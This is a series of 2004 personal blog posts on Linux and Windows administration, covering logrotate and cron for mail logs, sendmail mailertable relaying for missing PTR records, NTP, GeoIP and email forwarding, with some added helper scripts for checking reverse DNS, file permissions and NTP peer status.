# Logrotate file for ppp RPM

/var/log/ppp/connect-errors {
        missingok
        compress
        notifempty
        daily
        rotate 5
        create 0600 root root
}

[/os/unix/linux/sysmgmt] permanent link

Fri, Sep 17, 2004 8:40 pm

Daily Rotation of Mail Logs

For a Linux mail server I set up, I want to have sendmail's log file, which is /var/log/maillog, rotated daily rather than once a week. With the default setting for logrotate, the file maillog will be closed and become maillog.1 after a week. If there is a maillog.1 it becomes maillog.2, etc. I want this to occur at midnight every night. To achieve the daily rotation, log in under the root account and edit the file /etc/logrotate.d/syslog, removing /var/log/maillog from the line where it is listed with all of the other log files that get rotated. Then create a new logrotate control file, e.g. /etc/maillogrotate.conf. Don't put it in the /etc/logrotate.d directory. My maillogrotate.conf file contains the following lines:

# Begin maillogrotate control file
/var/log/maillog {
   daily
   rotate 14
   sharedscripts
   create 0600 root root
   missingok
   postrotate
   /bin/kill -HUP `cat /var/run/syslogd.pid 2> /dev/null` 2> /dev/null || true
   endscript
}
# End maillogrotate control file

The meaning of the lines is as follows:

  1. Comment
  2. Specifies the file to be rotated, /var/log/maillog
  3. Indicates the file should be rotated on a daily basis
  4. rotate 14 indicates 14 previous versions (2 weeks worth of logs) should be kept, i.e. there will be a maillog file as well as maillog.1 through maillog.14
  5. sharedscripts means that the postrotate script will only be run once, not for every file that is rotated.
  6. create 0600 root root indicates that immediately after logrotate has rotated the file, it should create a new file with the same name as the one just rotated, in this case maillog. The permissions for the file, 0600, indicate that the owner will have read and write access to the file, but no one else will be given any access to the file. After access is specified, the owner and group for the file are each set to root (the format is create mode owner group).
  7. missingok indicates that if the log file is missing, proceed to the next one without issuing an error message.
  8. Any lines between postrotate and endscript will be executed after the rotation is completed. In this case, the syslog process will be restarted. The process id for syslog is stored in /var/run/syslogd.pid, so cat /var/run/syslogd.pid displays the contents of syslogd.pid. The 2> /dev/null at the end indicates that STDERR (error messages) will be redirected to /dev/null, which means that they are discarded. The backticks around this command (be certain to use the ` character, which is on the key to the left of the 1 key, not the single quote ') mean take the output of this command and use it as an argument to /bin/kill -HUP, which kills the syslog process, which will get automatically restarted. The second 2> /dev/null means that any error messages generated from the kill command are also discarded. The || true at the end means that if there is a problem with the kill command, this part of the script is still marked as successful, i.e. it doesn't abort with an error message. The || means "or" and true always returns a successful exit status.

You then need to create a crontab entry with crontab -e. This will open the crontab file in the vi editor. The crontab file can be used to run commands on a scheduled basis. Hit the i key to put the vi editor in insert mode then type the following command:

0 0 * * * /usr/sbin/logrotate /etc/maillogrotate.conf 1>/dev/null 2>/dev/null

Then hit the : (colon) key and type wq to save the file and exit from the editor.

The crontab file consists of 6 fields:

minute: A number from 0 to 59 indicating the minute the command will run
hour: A number from 0 to 23 indicating the hour for the command to be run
day of month: A number from 1 to 31 indicating the day of the month to run the command
month: A number from 1 to 12 indicating the month to run the command
day of week: A number from 0 to 6 (Sunday to Saturday) for the command to be run
command: The command to be run

So the listed crontab entry will run the /usr/sbin/logrotate program at midnight every day (the asterisks mean use all possible values for the field). The logrotate program will use the file I created, /etc/maillogrotate.conf, to determine what it should do. Any output, whether standard output or error messages, is sent to /dev/null, i.e. discarded.

In addition to keeping two weeks worth of logs in the /var/log directory, I like to archive mail logs in a separate directory to be parsed by statistics generation programs. If I add new programs, I can run them on all the old log files to generate statistics for the entire year. So I create a /root/maillog directory to hold the maillog files and a program, copy-maillog, which will copy the previous day's maillog to that directory with that day's date appended to the filename. I place the copy-maillog file in /root/bin and make it executable.

mkdir /root/maillog
mkdir /root/bin

The copy-maillog program contains the following lines:

#!/bin/bash
cp -a /var/log/maillog.1 /root/maillog/maillog.$(date --date=yesterday +%m%d%y)

This will copy the previous day's maillog file, maillog.1, to the /root/maillog/ directory. The $(date --date=yesterday +%m%d%y) extension means append yesterday's date formatted as month, day, year, e.g. maillog.091604 for the September 16, 2004 mail log file.

To make the script executable, type chmod 700 copy-maillog.

I then create a crontab entry to run copy-maillog script at half past midnight every night. Use crontab -e again to edit the crontab file, then move the cursor to the end of the file and hit the a key to append data after the cursor. Hit the enter key to start a new line and insert the following:

30 0 * * * /root/bin/copy-maillog 1>/dev/null 2>/dev/null

Then hit the Esc key followed by the colon key. Type wq to save the modifications to the crontab file and exit from the editor. If you then type crontab -l to list the contents of the crontab file, you should see something similar to the following:

[root@mail bin]# crontab -l
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.8726 installed on Fri Sep 17 18:27:16 2004)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
0 0 * * * /usr/sbin/logrotate /etc/maillogrotate.conf 1>/dev/null 2>/dev/null
30 0 * * * /root/bin/copy-maillog 1>/dev/null 2>/dev/null

References:

  1. How to rotate maillogs daily on RedHat
  2. Linux / Unix Command: logrotate
  3. Sams Teach Yourself Shell Programming in 24 Hours
  4. Redirection, Pipes, and Backticks

[/network/email/sendmail] permanent link

Wed, Sep 15, 2004 11:10 pm

Bandwidth Monitoring on a Linux System

On a Linux system, if you need information on how much bandwidth is being used and what type of traffic is consuming the bandwidth, two tools you can use that don't require a Graphical User Interface (GUI) are IPTraf and Linux Bandwidth Monitor (bwmon).

IPTraf description from Red Hat's IPTraf package:

IPTraf is a console-based network monitoring utility. IPTraf gathers data like TCP connection packet and byte counts, interface statistics and activity indicators, TCP/UDP traffic breakdowns, and LAN station packet and byte counts. IPTraf features include an IP traffic monitor which shows TCP flag information, packet and byte counts, ICMP details, OSPF packet types, and oversized IP packet warnings; interface statistics showing IP, TCP, UDP, ICMP, non-IP and other IP packet counts, IP checksum errors, interface activity and packet size counts; a TCP and UDP service monitor showing counts of incoming and outgoing packets for common TCP and UDP application ports, a LAN statistics module that discovers active hosts and displays statistics about their activity; TCP, UDP and other protocol display filters so you can view just the traffic you want; logging; support for Ethernet, FDDI, ISDN, SLIP, PPP, and loopback interfaces; and utilization of the built-in raw socket interface of the Linux kernel, so it can be used on a wide variety of supported network cards.

A ZDNet article, Police your network traffic with IPTraf, explains how to use IPTraf to log and monitor IP traffic on your system.

You can download IPTraf from the developer's website or you may already have it with your distribution of Linux. An RPM is available from Red Hat or from this site.

The options when running bwmon are shown below:

Linux Network Bandwidth Monitor $Revision: 1.3 $
by Kimmo Nupponen (kimmoon@users.sourceforge.net)
$Date: 2002/05/08 06:33:09 $

usage: bwmon [-b] [-h] [-a] [-m] [-u seconds]
        -a Print bandwidth utiliasation in Kbytes rather than Kbits. The default
           is to use Kbits
        -a Print also average bandwidth since last boot per interface
        -m Print maximum bandwidth since launch of this utility
        -h Print this help message
        -u Update timeout (integer value)

        Use <space-bar> to refresh the screen before update timeout expires
        Use 'q' or 'Q' to exit this utility

Note that you have to have proc mounted to allow this software
to work!

bwmon Screenshot
IPTraf Screenshots

[/os/unix/linux/network] permanent link

Wed, Sep 15, 2004 11:09 am

Feature Comparison Between Adobe Acrobat 6.0 Standard and Professional

A chart is available at http://www.adobe.com.au/events/roadshows/pdfs/FeatureComparision.pdf comparing the features found in Adobe Acrobat 6.0 Standard and Professional versions. The chart also covers Adobe Reader 6.0 and Acrobat Elements 6.0.

[/os/windows/software/pdf] permanent link

Sun, Sep 12, 2004 10:46 pm

Painting Plastic

If you want to paint cases, parts, or most plastics, you can use Fusion paint from Krylon. The paint dries in 15 minutes or less.

The paint comes in the following colors:

ZDNet's Brian Cooley reports it worked well on his Teo 300 cellphone in his September 9, 2004 entry in Dealing with technology in real life column.

[/pc/hardware/miscellaneous] permanent link

Mon, Aug 30, 2004 8:38 pm

Blosxom Calendar Plugin

A plugin to add a calendar to a Blosxom blog is available from Mt. Molelog or from here.

When I first installed the plugin, I received an "Error 500" error from my blog's webpage with the error message "Premature end of script headers: blosxom.cgi". The webpage loaded correctly once I changed the ownership of the state directory, which lies beneath the plugins directory. I used the following commands to change the user and group for the directory:

chown apache state
chgrp apache state

I used apache as the owner and group, since my web server runs Apache webserver software. I could also have used chmod 777 to make the directory world writable, but that would be much less secure, since anyone else on the system could then have write access to the directory.

[/network/web/blogging/blosxom] permanent link

Mon, Aug 30, 2004 5:36 pm

No PTR Record

If you receive bounced messages with "cannot resolve PTR record" or "(reason: 554 5.7.1 The server sending your mail [xxx.xxx.xxx.xxx] does not have a reverse DNS entry. Connection Rejected" as the reason listed for the message bouncing, with "xxx.xxx.xxx.xxx" representing the IP address for your SMTP server, or see messages such as "Relaying temporarily denied. Cannot resolve PTR record for" followed by your mail server's IP address in your /var/log/maillog file, then the email server that received the message checked the Internet Protocol (IP) address of the sending server. It tried to do a "reverse lookup" on the IP address to obtain the name of the server. When it couldn't perform the reverse lookup, it bounced the message with a statement that it couldn't resolve the PTR record. A PTR record is an entry in a Domain Name System (DNS) server that maps an IP address back to a name.

If you see references to http://postmaster.info.aol.com/errors/421dnsnr.html for messages destined for aol.com or netscape.net users, it is due to the same issue. Netscape.net is owned by AOL.

An email server administrator may configure an email server to perform such a check to block spammers. I suppose the thinking is that systems used by spammers are more likely not to have PTR records in a DNS server. But, since many email servers not used by spammers will also not have PTR records, I believe such a check is likely to block as much, if not more, legitimate email than spam. And it is hardly an effective means of eliminating spam, since many systems transmitting spam will have PTR records.

A small business may have its own email server with a domain name that maps to an IP address, but the company's ISP may not have an entry in a DNS server that maps that IP address to a name. In such a case, the business may find that email to some domains bounces with the error message about the missing PTR record.
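To see what a receiving server would find for your own mail server, the following added example (not part of the original post) builds the in-addr.arpa name queried for a PTR record and classifies the result. It goes one step beyond the check described above by also comparing the forward lookup of the returned name, a stricter test some receivers apply; the function names are illustrative, the addresses in the comments are documentation placeholders, and the live lookup assumes the dig utility is installed.

```shell
#!/bin/sh
# Added example: does an IPv4 address have a PTR record, and does the PTR name
# resolve back to the same address?

# Print the in-addr.arpa name queried for the PTR record of an IPv4 address.
# Returns 1 (printing nothing) if the argument is not a dotted quad.
ptr_name() {
    ip=$1
    case $ip in
        *[!0-9.]*|''|.*|*.|*..*) return 1 ;;
    esac
    old_ifs=$IFS; IFS=.
    set -- $ip
    IFS=$old_ifs
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        [ "${#octet}" -le 3 ] || return 1
        [ "$octet" -le 255 ] || return 1
    done
    printf '%s.%s.%s.%s.in-addr.arpa\n' "$4" "$3" "$2" "$1"
}

# Classify a lookup result without touching the network.
#   $1 = IP address, $2 = PTR answer (empty if none),
#   $3 = space-separated addresses the PTR name resolves to
# Prints no-ptr, ptr-mismatch or ok.
classify_rdns() {
    ip=$1; ptr=$2; fwd=$3
    if [ -z "$ptr" ]; then
        echo "no-ptr"
        return 0
    fi
    for addr in $fwd; do
        if [ "$addr" = "$ip" ]; then
            echo "ok"
            return 0
        fi
    done
    echo "ptr-mismatch"
}

# Live check using dig: reverse lookup, then forward lookup of the answer.
check_rdns() {
    ip=$1
    name=$(ptr_name "$ip") || { echo "not an IPv4 address: $ip" >&2; return 2; }
    ptr=$(dig +short -x "$ip" | head -n 1)
    fwd=""
    if [ -n "$ptr" ]; then
        fwd=$(dig +short A "$ptr" | tr '\n' ' ')
    fi
    echo "$ip ($name): $(classify_rdns "$ip" "$ptr" "$fwd")"
}

# Run the live lookup only when an address is given, e.g.:
#   sh check-rdns.sh 192.0.2.25
if [ $# -gt 0 ]; then
    check_rdns "$1"
fi
```

A result of no-ptr corresponds to the bounce described above and is fixed by whoever controls the reverse zone for the address, normally the ISP.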

If you are a system administrator with users reporting that they are receiving bounced messages with the "cannot resolve PTR record" for messages addressed to certain domains, then you can configure your email server to send email to just those domains through another email server instead. For instance, your ISP may have restrictions that prevent you from sending email to more than a limited number of recipients at one time. You may have a mailing list that has more email addresses than the ISP allows to be reachable with one message. So you need to use your own email server to reach all of the members of the mailing list. But some of the mailing list members may be using email servers that attempt to look up a name from the IP address of the sending server contacting them.

If you are running sendmail to transmit email, you can edit mailertable, which will be in /etc/mail on a RedHat Linux system. The mailertable file contains special treatment information for a specific domain or family of domains.

As an example, suppose email to bob.bobaroo@us.danzas.com is bouncing with the message about "cannot resolve PTR record". You can add the following line to /etc/mail/mailertable:

us.danzas.com                   smtp:[smtp.centrivity.net]

Once you've added the line, you need to run makemap, to produce the mailertable database sendmail uses. You then need to restart sendmail.

makemap hash /etc/mail/mailertable </etc/mail/mailertable
/etc/init.d/sendmail restart

The first command above will produce or update the file /etc/mail/mailertable.db. I am presuming that you already have mailertable support within sendmail. You can check if that is the case by looking for mailertable within your sendmail.mc file as below:

grep mailertable /etc/mail/sendmail.mc

You should see something like the following, if sendmail is already configured for mailertable support.

FEATURE(`mailertable',`hash -o /etc/mail/mailertable.db')dnl

The above example presumes that the ISP server, smtp.centrivity.net, does not require authentication. If the server requires authentication, then you will need to modify the access file, which you may find in /etc/mail. Let's say that the smtp.centrivity.net server accepts plaintext authentication with a userid of jsmith and a password of GrassHopper. You could enter the following line in /etc/mail/access to have sendmail on your system send the necessary authentication information to the smtp.centrivity.net server.

AuthInfo:smtp.centrivity.net "U:jsmith" "P:GrassHopper" "M:PLAIN"

You would then also need to produce or update /etc/mail/access.db using the makemap command.

makemap hash /etc/mail/access </etc/mail/access

In the case of the ISP's server requiring authentication in order to send email through it to a destination address that is not an email address on the ISP's servers, you would edit the mailertable and access files before restarting sendmail with /etc/init.d/sendmail restart.
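Because the AuthInfo line puts the relay password in plain text in /etc/mail/access, and makemap copies it into access.db, both files are worth checking for permissions that let other local users read them. The script below is an added example, not part of the original post; the function names are illustrative, it assumes GNU stat as found on Linux, and it treats owner-only access as the policy being checked.

```shell
#!/bin/sh
# Added example: flag sendmail map files that hold AuthInfo credentials and are
# readable by anyone other than their owner.

# Print the octal permission bits of a file (GNU stat).
file_mode() {
    stat -c '%a' "$1"
}

# Return 0 if an octal mode grants any access to group or other.
mode_is_exposed() {
    case $1 in
        0|*00) return 1 ;;   # group and other digits are both 0
        *)     return 0 ;;
    esac
}

# Return 0 if the text map contains an uncommented AuthInfo entry.
has_authinfo() {
    grep -q '^[[:space:]]*AuthInfo:' "$1"
}

# Audit a text map (e.g. /etc/mail/access) and its .db companion.
# Returns 0 if nothing is exposed, 1 if a file is exposed, 2 if the map is missing.
audit_authinfo() {
    src=$1
    if [ ! -f "$src" ]; then
        echo "missing: $src"
        return 2
    fi
    if ! has_authinfo "$src"; then
        echo "ok: no AuthInfo entries in $src"
        return 0
    fi
    exposed=0
    for f in "$src" "$src.db"; do
        [ -f "$f" ] || continue
        m=$(file_mode "$f")
        if mode_is_exposed "$m"; then
            echo "exposed: $f is mode $m, so the AuthInfo password is readable beyond its owner"
            exposed=1
        fi
    done
    if [ "$exposed" -eq 0 ]; then
        echo "ok: $src and its map are owner-only"
    fi
    return "$exposed"
}

# Audit the file named on the command line, e.g.:
#   sh audit-authinfo.sh /etc/mail/access
if [ $# -gt 0 ]; then
    audit_authinfo "$1"
fi
```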

References

  1. Using 'mailertable' in Sendmail
  2. SBC-Yahoo ® Authenticated SMTP

[/network/email/sendmail] permanent link

Sat, Aug 28, 2004 12:32 am

Determining the Country Associated with an IP Address

You can use GeoIP to look up the country associated with a given IP address (you can also give it a hostname to determine the country). To create the GeoIP program geoiplookup, you can download the C source code from http://www.maxmind.com/app/c. You will need a C compiler to compile the code. If you intend to use it on a Linux or Unix system, you will have a C compiler on the system, so just follow the instructions below to create the geoiplookup program or read the INSTALL file that comes with the file you download from the MaxMind website. If you intend to install it on a Windows system, read the READMEwin32.txt file that is in the .gz file you download.

Unzip the downloaded file, extract the contents of the resultant tar file and then change the working directory to the GeoIP directory created from the contents of the tar file.

gunzip GeoIP-1.3.6.tar.gz
tar -xvf GeoIP-1.3.6.tar
cd GeoIP-1.3.6

Then run the configure and make commands (installation instructions are in the INSTALL file created in the GeoIP directory, but are also summarized here).

./configure
make

You can then issue the command make check to run self-tests of the package, but this step isn't required. You should then type make install to install the software.

make check
make install

At this point you won't need the program binaries and other files in the source code directory and they can be removed with make clean. You can also remove the files created by configure by issuing the command make distclean. You can also remove the GeoIP directory and its contents, if you wish, since make install installs the package's files in /usr/local/bin, /usr/local/man, etc.

make clean
make distclean
cd ..
rm -fr GeoIP-1.3.6

When the program is installed, you will have a geoiplookup program in /usr/local/bin. You can use that program to look up the country associated with an IP address or hostname. The country is based on the registration for the IP address, i.e. particular blocks of IP addresses will be associated with particular countries or at least areas of the world. The company using the IP address may be based in some other country, however. For example:

geoiplookup eapplique.com
GeoIP Country Edition: US, United States

The company has their website, eapplique.com, hosted on a server with a US IP address. But if you issue the command whois eapplique.com, you will see the domain name is registered to a company in India (the company provides website design services). So geoiplookup gives you an indication of where a server is likely to be located, but not necessarily the location of a particular company using that server. Companies and individuals may use servers located in other countries.

Registrant:
THE SCS GROUP (EAPPLIQUE-DOM)
   K 3/17, DLF Phase II
   GURGAON, HARYANA 122002
   IN

   Domain Name: EAPPLIQUE.COM

Here is an example of a lookup for an IP address:

geoiplookup 202.64.156.35
GeoIP Country Edition: HK, Hong Kong

[/network/Internet/IP] permanent link

Tue, Aug 24, 2004 11:10 pm

Changing the "From" Address in Outlook 2000

To change the "From" address of a message in Outlook, create a new account using the address you wish to use as an alternative "From" address. You can create a new account by the following steps:

  1. Click on Tools.
  2. Click on Accounts.
  3. Click on the Mail tab at the top of the window.
  4. Click on the Add button then select Mail.
  5. Put in the display name you wish to appear in the message. This is just whatever you wish to be the name recipients will see with the email address, e.g. "John Smith".
  6. Click on the Next button.
  7. Type in the alternative e-mail address you wish to use.
  8. Click on the Next button.
  9. Select whether the server you wish to use is a POP3 or IMAP server and specify the server names for incoming and outgoing email.
  10. Click on the Next button.
  11. Put in the password if you want the system to remember it rather than prompting you each time, otherwise leave it blank and uncheck "Remember password".
  12. Click on the Next button.
  13. Select your connection method and click on Next.
  14. Click on the Finish button.

If this isn't an email account you will be checking regularly, but just an alias, i.e. an alternative address that points to the same account as one you are already checking, select the account by clicking on it and then click on Properties. Then uncheck "Include this account when receiving mail or synchronizing". Then click on Ok. Then click on Close to close the Internet Accounts window. You might want to send a message with information@somewhere.com as the "From" address, rather than jsmith@somewhere.com, so in the case that information@somewhere.com is just an alias pointing to the jsmith@somewhere.com mailbox, you would uncheck the "Include this account when receiving mail or synchronizing", since it isn't a separate account.

Once you've gone through the above procedure, you won't need to repeat it again and can use the alternate address you specified as the "From" address in messages by the following procedure:

  1. Compose a message in Outlook the way you normally would.
  2. You may see "To", "Cc", and "Subject" fields, but no "From" field. Click on the Options button.
  3. Click on the downward pointing triangle to the right of the Send message using field to see the list of email addresses you can use in the "From" field. Pick the one you wish to use and then click on the Close button.
  4. Fill in the "To" and "Subject" fields as usual, edit the message and then click on the Send button. The message will now go out with the address you picked for the "From" field.

[/os/windows/office/outlook] permanent link

Mon, Aug 23, 2004 11:05 pm

Keeping a Linux System's Time Accurate

PC and workstation clocks are not highly accurate and will tend to drift from the correct time over time. To keep the system's clock accurate, one can use the Network Time Protocol (NTP). The fact that a system's clock is off by a few minutes may not seem important at first, but if you have to troubleshoot problems involving multiple systems, you will realize that it can take much longer to troubleshoot if the clocks on the systems vary and you must mentally adjust the times to determine the order of events.

NTP software will provide the capability for a system to contact a time server, which provides an accurate time source. In the United States time servers may be tied back to the time source provided by the National Institute of Standards and Technology (NIST).

On RedHat Linux systems, you can use the ntp package to set up your system to obtain time from a time server using NTP.

Installing and configuring the ntp package on RedHat Linux is detailed below. The example below uses ntp-4.0.99k-15.i386.rpm, which is version 4.0.99k release 15 of the ntp client. If you are using a later version of RedHat Linux, a newer version of ntp may be available for your version of Linux. Except for the RPM file name, the installation and configuration process should be similar.

  1. Install the package, e.g. rpm --install ntp-4.0.99k-15.i386.rpm.

  2. Edit /etc/ntp.conf file. Add a server line to point to a publicly accessible time server, e.g. server 198.82.162.213 to use the time server lennier.cc.vt.edu. You then should have lines similar to the following in the ntp.conf file:

    server 198.82.162.213
    server 127.127.1.0 # local clock
    fudge 127.127.1.0 stratum 10


  3. Use chkconfig to configure the service to start when the system boots.

    chkconfig ntpd on

  4. Start the service.

    /etc/init.d/ntpd start

  5. If you wish to immediately update the time to match that on the time server, you can use the ntpdate command, e.g. ntpdate -b lennier.cc.vt.edu.

You can check that the service is functioning with the ntpq command.

ntpq -p
     remote           refid      st t when poll reach   delay   offset  jitter
==============================================================================
 lennier.cc.vt.e Tick.UH.EDU      2 u   34   64    1   28.516    0.340   0.000
 LOCAL(0)        LOCAL(0)        10 l    9   64    1    0.000    0.000   0.000
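For routine monitoring, the ntpq -p output can be checked by script instead of by eye. The following added example (not part of the original post) reports each remote peer as ok, unreachable (reach of 0, meaning no recent poll was answered) or offset-high (offset, in milliseconds, beyond a limit); the function names, the 100 ms default and the two ntp-*.example peers in the sample are constructed for illustration.

```shell
#!/bin/sh
# Added example: summarise `ntpq -p` output for monitoring.

# Read `ntpq -p` output on stdin and print "<peer> <status>" per remote peer.
#   $1 = offset limit in milliseconds (default 100)
# The first column of each line is the tally code, so it is cut off before the
# fields are split. The local clock driver LOCAL(n) is skipped.
ntp_peer_status() {
    limit=${1:-100}
    awk -v limit="$limit" '
        /^ *remote / || /^=+/ { next }          # header and separator lines
        {
            n = split(substr($0, 2), f, " ")    # drop the tally code column
            if (n < 10) next                    # not a peer line
            peer = f[1]; reach = f[7] + 0; offset = f[9] + 0
            if (peer ~ /^LOCAL\(/) next
            if (offset < 0) offset = -offset
            if (reach == 0)          status = "unreachable"
            else if (offset > limit) status = "offset-high"
            else                     status = "ok"
            print peer, status
        }'
}

# Print the number of peers whose status is not "ok".
ntp_problem_count() {
    ntp_peer_status "$@" | awk '$2 != "ok" { n++ } END { print n + 0 }'
}

# Sample input: the first two peer lines are the output shown above; the last
# two are constructed to show an unreachable peer and a large offset.
sample_ntpq_output() {
    cat <<'EOF'
     remote           refid      st t when poll reach   delay   offset  jitter
==============================================================================
 lennier.cc.vt.e Tick.UH.EDU      2 u   34   64    1   28.516    0.340   0.000
 LOCAL(0)        LOCAL(0)        10 l    9   64    1    0.000    0.000   0.000
 ntp-a.example   .INIT.          16 u    -   64    0    0.000    0.000   0.000
-ntp-b.example   192.0.2.10       3 u   12   64  377   41.200 -250.100   3.100
EOF
}

# Demonstration on the embedded sample.
sample_ntpq_output | ntp_peer_status 100
```

On a live system, pipe the real output into the function instead: ntpq -p | ntp_peer_status 100.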

You can use the netstat command to check whether your system is functioning as an NTP server, which means it will be listening on NTP UDP port 123.

netstat -a | grep "ntp"
udp        0      0 gna.somewhere.com:ntp    *:*
udp        0      0 localhost.localdoma:ntp *:*
udp        0      0 *:ntp                   *:*

You should see the system name followed by ":ntp", which indicates it is listening for connections on the NTP port, UDP port 123.

If you are blocking access to the system with a firewall, you will need to provide a rule for UDP connections to port 123, if you want to allow other systems the capability of obtaining the time from your NTP server.

If you wish to trace the path back through a sequence of time servers to find the master time source, you can use the ntptrace command.

ntptrace
localhost.localdomain: stratum 3, offset 0.000100, synch distance 0.22896
lennier.cc.vt.edu: stratum 2, offset -0.016537, synch distance 0.04396
time-b.nist.gov: stratum 1, offset -0.012730, synch distance 0.00000, refid 'ACTS'

The example above shows that the system gets its time from lennier.cc.vt.edu, a stratum 2 server, which in turn gets the time from time-b.nist.gov, a stratum 1 server.

References

  1. Decibels Linux NTP Tutorial
  2. NIST Internet Time Service
  3. NTP - The Network Time Protocol
  4. ntpq - standard NTP query program
  5. ntptrace - trace a chain of NTP servers back to the primary source
  6. US Naval Observatory NTP Network Time Servers
  7. Using the Network Time Protocol to Sync Your Network
  8. Keeping Time on Windows Machines

[/os/unix/linux/network] permanent link

Wed, Aug 11, 2004 12:07 pm

Determining the Version of Irix Running on an SGI System

To determine which version of the Irix operating system (OS) you are running on a Silicon Graphics, Inc. (SGI) system, use the "uname -R" command.

uname -R
6.5 6.5.19m

The second of the two values, minus the trailing character, is the actual version number, e.g. 6.5.19 above. SGI calls this value the "extended" version number.

The "-R" option to the uname command is unique to Irix systems. See the Irix uname manpage for further information on version numbering and options for the uname command on Irix systems.

[/os/unix/irix] permanent link

Mon, Jul 26, 2004 11:16 pm

CDisplay Comic Reader

A family member with a fairly extensive comic collection recently discovered files with a .cbr extension, which purportedly contained comics in an electronic format. After a little investigation I found that the CBR extension was listed on the File Extension Source as being associated with CDisplay RAR archived comic book files (see http://www.filext.com/detaillist.php?extdetail=CBR).

The CDisplay program, which can be used to read these files, has a webpage at http://www.geocities.com/davidayton/CDisplay. The program reads files that contain collections of comic book pages in JPEG, PNG, and static GIF formats. It can read images stored in zip, rar, ace, or tar archives without needing to extract the image files from the archive file first. You can use the arrow keys on your keyboard or the space bar to view the pages of the comic sequentially.

The software is free and can be downloaded from http://cdisplay.techknight.com/setup.zip via a link from the developer's website. The author provides the following files from the http://cdisplay.techknight.com/ website:

[/os/windows/software/comics] permanent link

Fri, Jul 23, 2004 10:20 pm

Norton AntiVirus 2000 Intelligent Updater Fails

I've found that whenever I try to update the virus definitions for Norton Antivirus 2000 using the x86 Intelligent Updater package available from http://securityresponse.symantec.com/avcenter/download/pages/US-N95.html, I receive a message indicating the subscription is expired, though it is not expired. The error message I receive is as follows:

Symantec Security Response Intelligent Updater

Your virus protection cannot be updated.

Your subscription has expired. You must renew your subscription to continue using Intelligent Updater. Run LiveUpdate from Norton AntiVirus to renew your subscription and then run Intelligent Updater again.

Yet if I select Help, then About Norton Antivirus, and then click on the Norton AntiVirus tab, I see "Your virus definitions subscription started on 2/17/2004, and will expire in 210 days." I've tried this on several different occasions with similar results.

However, if I use the i32 Intelligent Updater package, which is available from the same URL, that package will update Norton AntiVirus 2000.

The i32 Intelligent Updater package, which is a smaller file than the x86 Intelligent Updater package, cannot be used to update Symantec AntiVirus Corporate Edition 8.0 servers or Norton AntiVirus Corporate Edition 7.6 servers, but can be used to update Corporate Edition clients. The x86 Intelligent Updater package can be used to update Corporate Edition clients and servers.

[/security/antivirus/symantec] permanent link

Mon, Jul 19, 2004 8:47 pm

Allowing VPN Access for a User Under Windows Small Business Server 2003

First you must configure Windows Small Business Server 2003 to function as a VPN server, which you can do by running the Routing and Remote Access Server Setup Wizard. Once you have done that, you can modify the properties for a user's account to allow the user to connect using a VPN client on his or her computer. To do so, take the following steps:

  1. Click on Start
  2. Click on Administrative Tools
  3. Click on Server Management
  4. Click on Users
  5. Right-click on a username and select Properties
  6. Click on the Dial-in tab
  7. Click on Allow access
  8. Click on OK
  9. Click on File then Exit to exit Server Management

If the user doesn't have permission for VPN access, the user will see a window appear with the following error message when he or she attempts to establish a VPN connection:

Verifying username and password...

Error 649: The account does not have permission to dial in.

[/os/windows/server2003] permanent link

Thu, Jul 15, 2004 10:59 pm

Missing Hibernate Button

I didn't see a Hibernate option on a Gateway model 600YG2 laptop running Windows XP when I clicked on Start and selected Turn Off Computer. But when I looked under Power Options within the Control Panel, the "Enable Hibernation" checkbox under the Hibernation tab was checked.

The three buttons that appear when I select Start then Turn Off Computer are Stand By, Turn Off, and Restart.

It is still possible to place the system in hibernate mode, however, by hitting the shift key when you move the mouse to place the cursor over the Stand By button. The button will change from Stand By to Hibernate and you can click on the button then to put the system in Hibernate mode.

Microsoft covers the issue in Knowledge Base Article 291790.

The difference between Hibernate and Standby mode is that in Standby mode the system goes into a low power mode saving information on the current state of the system and open applications in memory. In hibernate mode, the system stores that information on the hard disk in the hibernation file Hiberfil.sys. The system can return to its previous state quickly from standby mode, since accessing information in memory is very quick. It takes more time to restore the system from hibernate mode, since the system must read information from the hard disk for which access is much slower. But hibernate mode has the advantage of storing the information indefinitely even if the system is not connected to a power source. With a laptop in standby mode, if you don't have it plugged into a power source, eventually the battery will be drained and the contents of memory will be lost, since information only stays in memory if it is constantly refreshed. It doesn't take much power to keep the memory refreshed, so you may be able to stay in standby mode for many hours, but eventually the battery will be depleted and the information will be lost.

You can choose to have the system go into hibernate mode when you hit the power button, rather than powering off, by following these steps:

  1. Click on Start
  2. Select Control Panel
  3. Click on Performance and Maintenance. If you don't see Performance and Maintenance then you may have set the Control Panel display to "Classic" mode, in which case you can proceed to the next step.
  4. Click on Power Options
  5. Click on the Advanced tab
  6. Change the setting for When I press the power button on my computer to Hibernate
  7. Click on OK

[/os/windows/xp] permanent link

Thu, Jul 15, 2004 12:06 pm

Forwarding Email

If you are using a Unix or Linux system, you can redirect email sent to your account on that system to another account using a .forward file. You will need to create this file in your home directory, i.e. the one you are normally placed in when you log into the system.

You can create this file with any text editor or you can use the echo command to create the file as shown below.

echo 'liz-smith@starwars.com' > .forward

The above command will create a .forward file in the current directory. If you've placed it in your home directory, any email now sent to your account will instead be sent back out of the system to liz-smith@starwars.com.

Suppose you want to get the email in your inbox on the system, but also want it forwarded to another address. Let's assume your userid on the system is liz and you want the email to go to the same address as in the first example as well. You can then create the .forward file with the command below.

echo '\liz, liz-smith@starwars.com' > .forward

You need to put a "\" before the username, so that the system knows that it doesn't have to do any further forwarding for the account name you are placing after the "\". If you want messages to go to additional addresses, just add them onto the line with commas between the addresses.

When you use the ">" you are overwriting any existing .forward file, so, if you already have a .forward file and want to keep a copy of it, use a command such as the one below to copy it before issuing the echo command.

cp .forward .forward-old

If you want to stop forwarding, you need to remove the .forward file. If you want to stop forwarding, but want to keep the file available for future use, you can rename it as shown below.

mv .forward .forward-old

You may need to set appropriate permissions on the .forward file in order for the program processing email to be able to read your email file. Use the command below to make the .forward file "world-readable".

chmod 644 .forward

The six ensures that you can both read and alter the file, while the two fours ensure that the file is both group and world readable, but only you can delete or alter the file. Don't make the file group writeable, i.e. don't use chmod 664. If the file has group write permission set on it, sendmail won't use it and forwarding won't occur.

You can check the permissions on the file using the command ls -al .forward. Files that have a filename beginning with a period are considered hidden, so won't show up with just an ls command, so you need to use the -a option to show all files. You should see something like the following.

-rw-r--r--    1 liz      liz            29 Jul 14 23:06 /home/liz/.forward

If you have root access, you can check how sendmail will handle delivery of email to the liz account now by logging on as root and issuing the sendmail -bv command as below:

sendmail -bv liz
